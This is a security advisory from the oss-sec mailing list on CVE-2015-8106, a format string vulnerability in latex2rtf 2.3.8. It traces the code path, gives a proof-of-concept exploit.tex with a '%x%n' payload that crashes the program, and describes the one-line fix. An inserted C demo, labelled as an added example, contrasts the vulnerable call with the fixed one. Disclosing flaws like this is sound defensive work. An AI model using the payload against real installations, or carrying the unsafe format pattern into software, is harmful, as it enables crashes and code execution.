oss-sec mailing list archives

CVE-2015-8106 - latex2rtf v2.3.8 format string vulnerability


From: 김종권 <jgkim () ropas snu ac kr>
Date: Mon, 16 Nov 2015 19:18:10 +0900

Dear List,

I am writing this to report a format string vulnerability in the Ubuntu package latex2rtf (2.3.8, which is the latest version). I have also already been assigned a CVE identifier from MITRE, "CVE-2015-8106", so I want to make this vulnerability public.


- Target Platform
   Windows, Linux, OS X
- Target Version
   2.3.8 (Latest Version)

- Vulnerability description
When the user runs latex2rtf on a maliciously crafted tex file, an attacker can execute arbitrary code.
The function CmdKeywords processes the \keywords command in the tex file.
The variable `keywords' in the function CmdKeywords may hold a malicious input string, which is then used as the format argument of vsnprintf.

-- Step 1. (funct1.c 1789 line)

1789        char *keywords = getBraceParam();

For instance, the variable keywords will point to the string "MALICIOUS" when a text line "\keywords{MALICIOUS}" exists in an input tex file.

-- Step 2. (funct1.c 1798 line)

1798    fprintRTF(keywords);

fprintRTF() is called in line 1798, and the parameter is used as a format string, which can be malicious, as we described in step 1.

-- Step 3. (main.c 873 line)
858    void fprintRTF(char *format, ...){
      ...
873    vsnprintf(buffer, 1024, format, apf);
      ...

The value of format, which may be malicious, is used as an argument of vsnprintf in line 873, therefore arbitrary code can be executed.

-- Step 4. Our malicious input
"exploit.tex"
========================
\documentclass{article}
\begin{document}
\title{Exploitable}
\author{Jong-Gwon Kim}
\keywords{%x\%n\%n\%n}
\end{document}
=========================
Execute
==========================
~ $ latex2rtf -v
latex2rtf 2.3.8 r1240 (released June 16 2014)

Copyright (C) 2012 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

Written by Prahl, Lehner, Granzer, Dorner, Polzer, Trisko, Schlatterbeck.
~ $ latex2rtf exploit.tex
aborted (core dumped)
==========================

-- Step 5. How to fix
(funct1.c 1798 line)

1798    fprintRTF(keywords);  ===>  fprintRTF("%s", keywords);
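The vulnerable and fixed call shapes from steps 2, 3 and 5 side by side, as an added example that is not latex2rtf's own code: rtf_emit() is a constructed stand-in for fprintRTF(), and the input document text is constructed so that even the vulnerable path stays deterministic while still showing that the text is interpreted rather than copied.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Constructed stand-in for latex2rtf's fprintRTF() (main.c line 873): a
 * printf-style sink that formats into a caller buffer with vsnprintf. The
 * format attribute lets gcc/clang -Wformat-security flag non-literal formats. */
__attribute__((format(printf, 3, 4)))
static void rtf_emit(char *out, size_t outsz, const char *format, ...)
{
    va_list ap;
    va_start(ap, format);
    vsnprintf(out, outsz, format, ap);
    va_end(ap);
}

/* Vulnerable shape of funct1.c line 1798: document text IS the format. */
void emit_keywords_vulnerable(char *out, size_t outsz, const char *keywords)
{
    rtf_emit(out, outsz, keywords);   /* compiler warning: non-literal format */
}

/* Fixed shape from step 5: a literal "%s" format, document text is data only. */
void emit_keywords_fixed(char *out, size_t outsz, const char *keywords)
{
    rtf_emit(out, outsz, "%s", keywords);
}

/* Count '%' conversion directives in untrusted text, skipping the "%%" escape;
 * any non-zero count means the vulnerable path consumes arguments never supplied. */
int count_format_directives(const char *s)
{
    int n = 0;
    for (; *s; s++) {
        if (*s == '%' && s[1] == '%') s++;   /* literal "%%" escape */
        else if (*s == '%') n++;
    }
    return n;
}

int main(void)
{
    /* Constructed input with only "%%": no stack reads, but still rewritten. */
    const char *doc = "100%% pure";
    char buf[64];
    emit_keywords_vulnerable(buf, sizeof buf, doc);
    printf("vulnerable: %s\n", buf);   /* 100% pure  -> input was interpreted */
    emit_keywords_fixed(buf, sizeof buf, doc);
    printf("fixed:      %s\n", buf);   /* 100%% pure -> input passed through */
    return 0;
}
```

With the format attribute in place, compiling with -Wformat -Wformat-security reports the vulnerable call and stays silent on the fixed one, which is the same class of finding the static analyzer reported below.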


- How we found the vulnerability

We used a static analyzer, Sparrow[1], to find the format string bug. Our analyzer reported an alarm at latex2rtf main.c line 873, so we looked through the latex2rtf source code and found the bug.

Sparrow is a state-of-the-art static analyzer that aims to verify the absence of fatal bugs in C source. Sparrow is designed based on abstract interpretation, and the analysis is sound by design. Sparrow adopts a number of well-founded static analysis techniques[2,3] for scalability, precision, and user convenience.

References
[1]: http://ropas.snu.ac.kr/sparrow/
[2]: Selective Context-Sensitivity Guided by Impact Pre-Analysis. Hakjoo Oh, Wonchan Lee, Kihong Heo, Hongseok Yang, and Kwangkeun Yi. PLDI'14.
[3]: Design and Implementation of Sparse Global Analyses for C-like Languages. Hakjoo Oh, Kihong Heo, Wonchan Lee, Woosuk Lee, and Kwangkeun Yi. PLDI'12.

Sincerely, Jong-Gwon Kim & Woosuk Lee

-----------------------------
Jong-Gwon Kim
Graduate student
ROPAS lab. (http://ropas.snu.ac.kr/)
ROSAEC center (http://rosaec.snu.ac.kr/)
Seoul National University
(tel) +82-2-880-1865
(email) jgkim () ropas snu ac kr
-----------------------------
-----------------------------
Woosuk Lee
Ph.D. candidate
ROPAS lab. (http://ropas.snu.ac.kr/)
ROSAEC center (http://rosaec.snu.ac.kr/)
Seoul National University
(tel) +82-2-880-1865
(email) wslee () ropas snu ac kr
-----------------------------